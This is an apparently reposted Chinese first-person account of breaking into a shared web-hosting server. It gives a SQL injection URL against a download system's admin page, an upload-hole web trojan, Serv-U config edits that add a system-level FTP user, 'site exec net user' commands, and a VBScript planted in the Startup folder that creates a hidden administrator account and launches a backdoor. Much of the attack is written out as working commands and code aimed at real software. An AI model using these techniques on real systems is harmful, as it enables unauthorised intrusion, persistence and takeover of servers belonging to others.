对一台虚拟主机服务器的渗透 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    前几天听一树说了惊云下载系统的漏洞

    问题文件出在admin/user.asp

    提交

    http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1

    就相当于:

    select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’"

    利用access注入得到管理员密码

    上面有一个文件upfile.htm

    手工利用了下动网的upfile.asp漏洞

    就成功上传了个asp木马

    然后那个虚拟主机的c,d盘是NTFS分区

    不能访问E盘装着servu,php,webmail,

    F盘是虚拟站点

    servu安装目录可写~

    本来打算替换他servu文件的~但是觉的太麻烦

    还容易让管理员怀疑

    想起servu的本地提升来了

    在自己计算机上装了个servu

    添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限

    然后去servu安装目录里看ServUDaemon.ini

    格式是这样的

    [GLOBAL]

    Version=5.0.0.11

    LocalSetupPassword=072C63105200180D5C07170A7E3E

    LocalSetupPortNo=60628

    ProcessID=972

    [DOMAINS]

    Domain1=192.168.0.102||21|向导产生域|1|0|0

    Domain2=192.168.0.102||2121|123|2|0|0

    [Domain1]

    User1=www|1|0

    [USER=www|1]

    Password=ih0C292E1AC82920B7F384007F302A1296

    HomeDir=D:\xiaoben

    TimeOut=600

    Note1="Wizard generated account"

    Access1=D:\xiaoben|RLPWAMCD

    SKEYValues=

    [Domain2]

    User1=rover|1|0

    User2=123|1|0

    [USER=rover|2]

    Password=dx5D12C060F16C7166779414FA038E881D

    HomeDir=c:\

    TimeOut=600

    Maintenance=System

    Access1=C:\|RWAMELCDP

    SKEYValues=

    [USER=123|2]

    Password=kv3F6EED70340AD1478ADF95963A07FD00

    HomeDir=c:\

    TimeOut=600

    Access1=C:\|RWAMLCDP

    SKEYValues=

    ----------------

    其中rover用户就是我添加的那个

    在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini

    访照我本地的INI写进一个用户进去

    User1=rover|1|0

    [USER=rover|2]

    Password=dx5D12C060F16C7166779414FA038E881D

    HomeDir=c:\

    TimeOut=600

    Maintenance=System

    Access1=C:\|RWAMELCDP

    SKEYValues=

    保存~

    用我新建的用户和密码连接~

    好的,还是连上了

    ftp

    ftp>open ip

    Connected to ip.

    220 Serv-U FTP Server v5.0.0.4 for WinSock ready...

    User (ip:(none)): id //输入构造的用户

    331 User name okay, please send complete E-mail address as password.

    Password:password //密码

    230 User logged in, proceed.

    ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录,

对一台虚拟主机服务器的渗透

电脑资料

对一台虚拟主机服务器的渗透》(https://www.unjs.com)。

    250 Directory changed to /WINNT

    ftp>cd system32 //进入system32目录

    250 Directory changed to /WINNT/system32

    ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。

    提示没有权限~郁闷~

    但是我们有对C盘的访问权限了是不~hoho~

    把后门(server.exe)传他system32目录

    然后写一个VBs教本

    set wshshell=createobject ("wscript.shell")

    a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)

    b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0)

    b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0)

    b=wshshell.run ("cmd.exe /c server.exe",0)

    存为HELP.vbe

    这个教本的作用是修改tsinternetuser用户密码为rover1234

    并且提升为管理员

    然后执行system32目录下的server.exe

    把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动

    目录

    这样管理员只要一登陆就会执行那个教本~

    接下来就是等了~

    等他登陆~

    等了一段时间(看了一部蜘蛛侠的时间吧)~

    连接后门~得到admin权限的shell

    hoho~

    接下来是善后工作了~就不说了

    今天心情非常糟~有一些事情压的我喘不过气来

    考试的时候当老师面把卷子撕了,然后扬步走了~

    妈妈的~过程写的很乱~见谅

最新文章